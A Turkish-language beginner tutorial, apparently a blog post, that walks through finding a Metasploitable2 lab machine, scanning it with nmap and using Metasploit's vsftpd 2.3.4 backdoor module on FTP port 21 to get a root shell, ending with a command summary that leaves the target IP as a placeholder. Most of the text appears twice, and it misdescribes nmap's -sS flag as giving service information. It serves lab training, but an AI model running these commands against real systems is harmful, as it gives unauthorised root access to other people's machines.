Herkese merhaba dostlar, bu gün size masum bir ftp portunun nasıl tehlikeli olabileceğini anlatacağım. Bu konuda kullanacağımız ftp port 21. porttur. Bu portu bir exploit yardımı ile istismar edeceğiz. Amacımız karşı tarafta yetkili bir oturum ele geçirmek. İşlemlere başlamadan önce 21. ftp portu ile ilgili biraz bilgi vermek isterim.
21. ftp (file transfer protocol)
Bu port aslına bakılırsa bir dosya aktarım portudur. Site sahiplerinin kendi sitelerine resim, belge gibi dosyaları aktarmaları için kullanılır. Fakat bu port üzerinde bulunan güvenlik açıkları ile 21. port istismar ile faydalanılabilecek bir port olmuştur. Bu port genellikle kullanılmıyor ise kapalı yahut filtreli durumda tutulur. Şayet kullanılıyorsa filtreli ve sürekli güncel tutulması şarttır.
Yazının ilerleyen safhalarında da değineceğim fakat bir ön gösterimin kimseye zararı olmaz değilmi? Peki Maxim bey ben bu işlerde yeniyim ve bu portun açık olup olmadığını nasıl anlayacağım? Hiç merak etme kardeşim hemen göstereyim. Bir linux terminal açın öncelikle bu port taramasını yapmak için hedef bir cihaza ihtiyacımız var. (Bu konuda hedef cihaz içinde 21. ftp açığı bulunan ve yerel ağımda bulunan bir Metasploitable2 sistemi) Öncelikle şu cihazı bir bulalım.
Komut:
apt-get install netdiscover
netdiscover
Evet anlatmaya gerek yok görüyorsunuz. İşte cihazımız burada. Şimdi bu hedefin IP si üzerinden port bilgisi toplayalım.
Komut:
apt-get install nmap
nmap 192.168.1.7 -sS -sV
Burada gördüğünüz üzere port açık ve üzerinde çalışan bir servis var. Komutu açıklamak gerekirse "nmap" ana komut, "192.168.1.7" IP adresi, -sS servis bilgisi, -sV versiyon bilgisi içindir. Peki servis, versiyon bilgilerini neden çektik? Sebebi şu: Biz bu portu istismar edebilmek için bu port üzerinde çalışan servis üzerine adı "exploit" olan benim deyişimle "paket bomba" kullanacağız. Görüyoruz ki şuanda bu port üzerinde "vsftpd" servisi çalışıyor ve exploitler versiyonlara göre değişiklik gösterdiği için versiyonunada bakalım "2.3.4".
Bu kısımdan sonrası artık "vsftpd 2.3.4" sevisinin exploitini bulmakta. Burda da kullanacağımız araç Metasploit'in ta kendisi. Terminale "msfconsole" yazıyoruz ve açılmasını bekliyoruz. VE AÇILDI!..
Karşımıza Metasploitin arayüzü geldi. Şimdi istismar edeceğimiz servisi aratalım. "search vsftpd 2.3.4"
Gördüğünüz gibi tamda bu sürümün bir exploitini bulmuş bulunmaktayız. Bunu kullanalım. "use exploit/unix/ftp/vsftpd_234_backdoor"
Exploitin kullanım arayüzü karşımızda bizden istediği bilgiler var bunun için: "show options" yazıyoruz.
Bizden bu kısımda bir IP adresi ve istismar edilecek portu istiyor. Port zaten otomatik yazılı biz sadece IP ekleyeceğiz. "set RHOSTS 192.168.1.7" yazıyoruz ve eklenip eklenmediğini görmek için tekrar "show options" yazıyoruz.
Herşey tamam hack başlasın!.. Terminale "run" yazıyoruz ve bağlantı kurmasını bekliyoruz.
Bağlantı kuruldu. Eğer adımlarda bir hata yapmadıysanız karşı tarafta root yetkisinde olmalısınız.Deneyelim...
Evet gördüğünüz gibi işlem tamamdır. Daha anlaşılır olması adına bir video çektim onu ekleyeceğim ve kurulumdan kullanıma tüm komutları alt kısma vereceğim. Ayrıca bu işlerde yeni olan kardeşlerimi unutmadım kullandığım sistemlerin dosya linklerini de aşağıda paylaşacağım. Beni dinlediğiniz için teşekkür ederim. sürçülisan ettiysek affola. Esenlikle kalın.
Video Linki(Mega)
Komutlar:
apt-get install netdiscover
netdiscover
apt-get install nmap
nmap hedefip -sS -sV (örn: 192.168.1.7)
msfconsole
>search vsftpd 2.3.4
>use exploit/unix/ftp/vsftpd_234_backdoor
>>>show options
>>>set RHOSTS hedefip
>>>run
Kaynak Linkleri:
Metasploitable2
vmware
kali
21. ftp (file transfer protocol)
Bu port aslına bakılırsa bir dosya aktarım portudur. Site sahiplerinin kendi sitelerine resim, belge gibi dosyaları aktarmaları için kullanılır. Fakat bu port üzerinde bulunan güvenlik açıkları ile 21. port istismar ile faydalanılabilecek bir port olmuştur. Bu port genellikle kullanılmıyor ise kapalı yahut filtreli durumda tutulur. Şayet kullanılıyorsa filtreli ve sürekli güncel tutulması şarttır.
Yazının ilerleyen safhalarında da değineceğim fakat bir ön gösterimin kimseye zararı olmaz değilmi? Peki Maxim bey ben bu işlerde yeniyim ve bu portun açık olup olmadığını nasıl anlayacağım? Hiç merak etme kardeşim hemen göstereyim. Bir linux terminal açın öncelikle bu port taramasını yapmak için hedef bir cihaza ihtiyacımız var. (Bu konuda hedef cihaz içinde 21. ftp açığı bulunan ve yerel ağımda bulunan bir Metasploitable2 sistemi) Öncelikle şu cihazı bir bulalım.
Komut:
apt-get install netdiscover
netdiscover
Evet anlatmaya gerek yok görüyorsunuz. İşte cihazımız burada. Şimdi bu hedefin IP si üzerinden port bilgisi toplayalım.
Komut:
apt-get install nmap
nmap 192.168.1.7 -sS -sV
Burada gördüğünüz üzere port açık ve üzerinde çalışan bir servis var. Komutu açıklamak gerekirse "nmap" ana komut, "192.168.1.7" IP adresi, -sS servis bilgisi, -sV versiyon bilgisi içindir. Peki servis, versiyon bilgilerini neden çektik? Sebebi şu: Biz bu portu istismar edebilmek için bu port üzerinde çalışan servis üzerine adı "exploit" olan benim deyişimle "paket bomba" kullanacağız. Görüyoruz ki şuanda bu port üzerinde "vsftpd" servisi çalışıyor ve exploitler versiyonlara göre değişiklik gösterdiği için versiyonunada bakalım "2.3.4".
Bu kısımdan sonrası artık "vsftpd 2.3.4" sevisinin exploitini bulmakta. Burda da kullanacağımız araç Metasploit'in ta kendisi. Terminale "msfconsole" yazıyoruz ve açılmasını bekliyoruz. VE AÇILDI!..
Karşımıza Metasploitin arayüzü geldi. Şimdi istismar edeceğimiz servisi aratalım. "search vsftpd 2.3.4"
Gördüğünüz gibi tamda bu sürümün bir exploitini bulmuş bulunmaktayız. Bunu kullanalım. "use exploit/unix/ftp/vsftpd_234_backdoor"
Exploitin kullanım arayüzü karşımızda bizden istediği bilgiler var bunun için: "show options" yazıyoruz.
Bizden bu kısımda bir IP adresi ve istismar edilecek portu istiyor. Port zaten otomatik yazılı biz sadece IP ekleyeceğiz. "set RHOSTS 192.168.1.7" yazıyoruz ve eklenip eklenmediğini görmek için tekrar "show options" yazıyoruz.
Herşey tamam hack başlasın!.. Terminale "run" yazıyoruz ve bağlantı kurmasını bekliyoruz.
Bağlantı kuruldu. Eğer adımlarda bir hata yapmadıysanız karşı tarafta root yetkisinde olmalısınız.Deneyelim...
Evet gördüğünüz gibi işlem tamamdır. Daha anlaşılır olması adına bir video çektim onu ekleyeceğim ve kurulumdan kullanıma tüm komutları alt kısma vereceğim. Ayrıca bu işlerde yeni olan kardeşlerimi unutmadım kullandığım sistemlerin dosya linklerini de aşağıda paylaşacağım. Beni dinlediğiniz için teşekkür ederim. sürçülisan ettiysek affola. Esenlikle kalın.
Video Linki(Mega)
Komutlar:
apt-get install netdiscover
netdiscover
apt-get install nmap
nmap hedefip -sS -sV (örn: 192.168.1.7)
msfconsole
>search vsftpd 2.3.4
>use exploit/unix/ftp/vsftpd_234_backdoor
>>>show options
>>>set RHOSTS hedefip
>>>run
Kaynak Linkleri:
Metasploitable2
vmware
kali
